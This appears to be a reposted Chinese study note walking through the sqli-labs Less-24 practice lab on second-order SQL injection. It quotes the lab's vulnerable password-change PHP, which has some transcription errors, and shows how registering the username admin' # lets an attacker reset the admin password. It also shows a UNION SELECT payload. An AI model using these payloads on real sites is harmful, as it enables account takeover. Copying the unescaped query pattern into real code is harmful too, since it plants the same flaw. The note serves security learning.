-
转自一个不知名大佬的笔记
----------------------------------less-24-----------------------------------
原url:
http://192.168.137.138/sqli-labs-master/Less-24/
二次注入
注入过程分为两个部分,语句插入和语句执行。常规的注入中都是将SQL语句插入后即可显示效果,出错或者注入结果(两次注入点在一起)。而二次注入中的第一步不会产生任何反应,因为他只是一个语句的插入,并没有运行,在第二步运行时才能执行第一步插入的语句并显示结果。而这两个点可能不在同一个位置。
先去站点进行信息收集:
在username和password框里进行注入测试,发现都失败了
页面下方的 Forgot your password? 功能不能用
页面下方的 New User click here? 功能可以使用,点击进入
返回的页面是创建新用户的,先创建一个 test,test 用户,回到主页面登陆
登陆进去后的页面是改密码用的
在去之前创建新用户的地方进行注入测试
结果还是显示:
Redirecting you to login page in 5 sec................
If it does not redirect, click the home button on top right
也就是说,创建用户对于现在我的能力来说,没有注入点
那么还是用之前test,test登进去
现在去测试一下,更新密码的地方有没有注入漏洞
发现返回页面要么 提示 更新密码成功,要么显示错误页面(但是并没有反馈错误信息),这里我们也可以认为没法注入
现在去查看 cookie ,发现有一个 PHPsessid ,这个和 cookie 的作用差不多,也是避免重复登录,但是安全性比 cookie 高多了,有这个,就说明 cookie 这里应该没法注入
那就说明,这个站点不存在一般性的漏洞了
总结所收集的信息:
① 网页存在登录框,可以登录,并回显结果
② 全为post隐式传参,不存在url参数
③ 可以添加新用户
④ 存在更改密码的功能,若旧密码输入正确则可以更新密码
⑤ 密码找回功能无法使用
⑥ 采用 php session 机制,不存在 cookie 注入
七 程序有一定的过滤机制,初步注入测试失败
让我们带着上面的疑问去看下程序的源码,从源头查找我们的答案
在pass_change.php文件中,能找到答案
<?PHP
session_start();//php session 机制
if (!isset(_SESSION["username"]))
{
header('Location: index.php');
}
header('Location: index.php');
}
?>
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
if (isset($_POST['submit']))
{
# Validating the user input........
$username= $_SESSION["username"];//从 session 机制中直接提取username
$curr_pass= mysql_real_escape_string($_POST['current_password']);//过滤处理
$pass= mysql_real_escape_string($_POST['password']);//过滤处理
$re_pass= mysql_real_escape_string($_POST['re_password']);//过滤处理
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1)
{
echo "Password successfully updated";
}
else
{
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
else
{
echo '<font size="5" color="#FFFF00"><center>';
echo "Make sure New Password and Retype Password fields have same value";
header('refresh:2, url=index.php');
}
}
?>
<?php
在上面的源码部分,我们看见在修改 password 的过程中,只有 username 是没做任何处理的
但是呢,username又不是受我们控制的,他是直接从 session 中获取
那么现在把注册页面和修改密码页面结合起来,如果通过构造语句,注册了一个 有注入语句的username,然后呢在改密码页面中,这个username又被提取出来没做任何过滤处理,那么能否达到注入的效果呢?
现在创建一个新用户:admin' #,1234
显示注册成功
现在去 mysql 数据库中查看
mysql> select * from users;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 15 | qwer | qwer |
| 16 | rewq | rewq |
| 17 | rewq | 1 |
| 18 | test | test |
| 19 | 123' | 123' |
| 20 | admin' # | 1234 |
+----+----------+------------+
19 rows in set (0.00 sec)
可见,第20个用户的用户名是 admin' #
现在用刚才注册的用户和密码去登陆
YOU ARE LOGGED IN AS
admin' #
You can Change your password here.
重置密码,随便改一个密码,看看什么效果(将1234改成123)
Password successfully updated(密码修改成功)
现在去数据库中看看:
mysql> select * from users;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | 123 |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
| 15 | qwer | qwer |
| 16 | rewq | rewq |
| 17 | rewq | 1 |
| 18 | test | test |
| 19 | 123' | 123' |
| 20 | admin' # | 1234 |
+----+----------+------------+
19 rows in set (0.00 sec)
结果 第20个 用户的 密码 并没有 修改成 123
反而 第8个用户 admin 的密码 本来是 admin 的,现在被改成了 123
现在我们看看之前部分源码中的 sql 语句拼接部分:
pass' where username='
curr_pass' ";
把用户名和当前密码和修改成的密码全部换上去
$sql = "UPDATE users SET PASSWORD='123' where username='admin' #' and password='1234' ";
虽然 这个 admin' # ,在创建的时候,并没有对数据库造成什么影响,但是从数据库中拿出来,去进行 sql 拼接的时候,就发生了影响,这个 # 就注释掉了后面的 内容,改变的是username为admin 用户的密码
在注册的时候,可以构造更复杂的语句,去达到搜集信息的目的
但是呢,username 这个地方,数据库可以限制其长度
比如:
构造一个注入语句:
1' and 1=2 union select 1,2,3 #
放到数据库中可能就变成了
1' and 1=2 union s
也没法起到相应的作用
这种机制也在一定程度上限制了注入,但是还是很危险,比如刚刚把 admin 的密码改成123
总结:
渗透前的信息收集(越复杂的程序,漏洞就越多,开发者会疏忽)
二次注入与数据过滤
(程序是非常信任数据库中的信息的,但通过本次课程,应该认识到,数据库中的信息也不一定是绝对安全的)
